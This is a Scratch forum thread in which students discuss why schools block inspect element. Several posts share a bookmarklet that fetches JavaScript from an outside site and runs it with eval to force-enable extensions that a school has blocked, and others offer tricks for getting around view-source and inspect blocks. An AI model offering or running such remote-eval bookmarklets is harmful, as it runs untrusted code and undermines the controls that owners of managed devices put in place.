Discuss Scratch

NanoRook
Scratcher
1000+ posts

Why do schools block inspect element?

I once changed around some text in inspect element when I was a kid. Showed it to a teacher and she thought it was pretty funny. The next day I had another teacher of mine say that I did nothing wrong but that I shouldn't talk about it/do it too much because district employees might see me doing it and think I'll hack into the LMS and change grades like I'm David Lightman in War Games.

I've heard other stories of kids saying someone is a ‘hacker’ because they used inspect element, so I imagine district employees just save themselves the trouble and shut it off to avoid stuff like that.
hill_walker123
Scratcher
100+ posts

Why do schools block inspect element?

I have to use chrome os and Google chrome. Turbo warp is blocked. inspect is blocked. command prompt is blocked. EVERYTHING IS BLOCKED!!!
PkmnQ
Scratcher
1000+ posts

Why do schools block inspect element?

My school doesn't block it, probably because this year, we're learning about web design, and our teacher is encouraging us to use inspect element to see how other webpages are made.
Kitten-da-Cat
Scratcher
1000+ posts

Why do schools block inspect element?

Epsilon_3 wrote:

ctrl+u is now blocked, so no more learning code. Turbowarp is blocked. I have noticed that some webs are blocked while school but not at home. This does not include ctrl+i and ctrl+u. Schools abuse their power (I'm over exaggerating but whatever)

SAVVYSCLUTTER wrote:

My school has Windows PCs and forces us to use Chrome. They block ‘View page source’ and ‘Inspect element’.
Chrome OS? If the browser is Chrome, but your on windows, consider yourself lucky. Chrome OS cant have anything without Linux mode, which is blocked.
same, turbo is not blocked.
ZZC12345
Scratcher
500+ posts

Why do schools block inspect element?

ideapad-320 wrote:

HeHeTeeHeeHee wrote:

oVexoPlays wrote:

javascript:fetch("https://compactcow.com/ltbeef/exploit.js").then(data=>{data.text().then(text=>{eval(text)})}); Try that bookmarklet.
bookmarklets are blocked supposedly, my friend tried one that rids the computer of all extensions but it didnt work
a bookmarklet cant do that.
It might if it's on a google.com page.
ajskateboarder
Scratcher
1000+ posts

Why do schools block inspect element?

It's probably blocked because everyone at the school is a bonehead who believes that devtools is used for hacking and permanently modifying your grades. But in defense, there really isn't any use for devtools besides debugging sites (writing a svelte app but every error is in the devtools…), so while your school doesn't have much of a reason to block devtools, there isn't much of a problem, right?
Knightbot63
Scratcher
1000+ posts

Why do schools block inspect element?

It's maybe blocked because of crazy things to unblock things. There is a website called https://use-inspect.glitch.me/ which gives you inspect but doesn't give you super power inspect.
zaid1442011
Scratcher
500+ posts

Why do schools block inspect element?

My school doesn’t even block anything.
0h10lol
Scratcher
3 posts

Why do schools block inspect element?

cuz theres a script that can unblock extensions

javascript:fetch("https://compactcow.com/ltbeef/exploit.js").then(data=>{data.text().then(text=>{eval(text)})});
PPPDUD
Scratcher
1000+ posts

Why do schools block inspect element?

0h10lol wrote:

cuz theres a script that can unblock extensions

javascript:fetch(“censored”).then(data=>{data.text().then(text=>{eval(text)})});
I think it's trying to install an extension.
medians
Scratcher
1000+ posts

Why do schools block inspect element?

zaid1442011 wrote:

My school doesn’t even block anything.
Wow, lucky.
ajskateboarder
Scratcher
1000+ posts

Why do schools block inspect element?

PPPDUD wrote:

0h10lol wrote:

cuz theres a script that can unblock extensions

javascript:fetch(“censored”).then(data=>{data.text().then(text=>{eval(text)})});
I think it's trying to install an extension.
By looking at the fetched JS closer:
...
document.toggleFunction = function(id){
    var clickedRow = document.getElementById(id);
    chrome.management.setEnabled(id, clickedRow.children[0].children[0].children[0].checked);
};
...
This seems to force-enable whatever extension you want! Neat :)
Not malicious at all
SAVVYSCLUTTER
Scratcher
500+ posts

Why do schools block inspect element?

If your school uses Chrome and blocks ‘View page source’, just add view-source: to the start of a URL.
TheGamerKing904
Scratcher
3 posts

Why do schools block inspect element?

One of the reasons is that you have access to things that are supposed to be hidden, you can change the appearance of everything, and probably a lot of other stuff stuff. Also, I found a javascript piece of code that bypasses some, but hardly any schools' inspect element blockers, and never ever on Chromebooks for some reason, and also it's not full access, just editing to text that you shouldn't be able to edit normally. The code: vvv document.body.contenteditable = ‘true’; document.designmode='on' void 0;
lolecksdeehaha
Scratcher
1000+ posts

Why do schools block inspect element?

HeHeTeeHeeHee wrote:

oVexoPlays wrote:

javascript:fetch("https://compactcow.com/ltbeef/exploit.js").then(data=>{data.text().then(text=>{eval(text)})}); Try that bookmarklet.
bookmarklets are blocked supposedly, my friend tried one that rids the computer of all extensions but it didnt work
No, it's just the bookmark that's patched. I suppose you're thinking about Ingot.

TheGamerKing904 wrote:

One of the reasons is that you have access to things that are supposed to be hidden, you can change the appearance of everything, and probably a lot of other stuff stuff. Also, I found a javascript piece of code that bypasses some, but hardly any schools' inspect element blockers, and never ever on Chromebooks for some reason, and also it's not full access, just editing to text that you shouldn't be able to edit normally. The code: vvv document.body.contenteditable = ‘true’; document.designmode='on' void 0;
WojtekGame
Scratcher
1000+ posts

Why do schools block inspect element?

maybe they block because they look like if they were “hacking” grades/games (also blocked but unrelated)?

this post was written hours ago but posted now
Spentine
Scratcher
1000+ posts

Why do schools block inspect element?

Perhaps to stop students from injecting malicious scripts to break the system.

Last edited by Spentine (May 13, 2023 02:17:51)

Powered by DjangoBB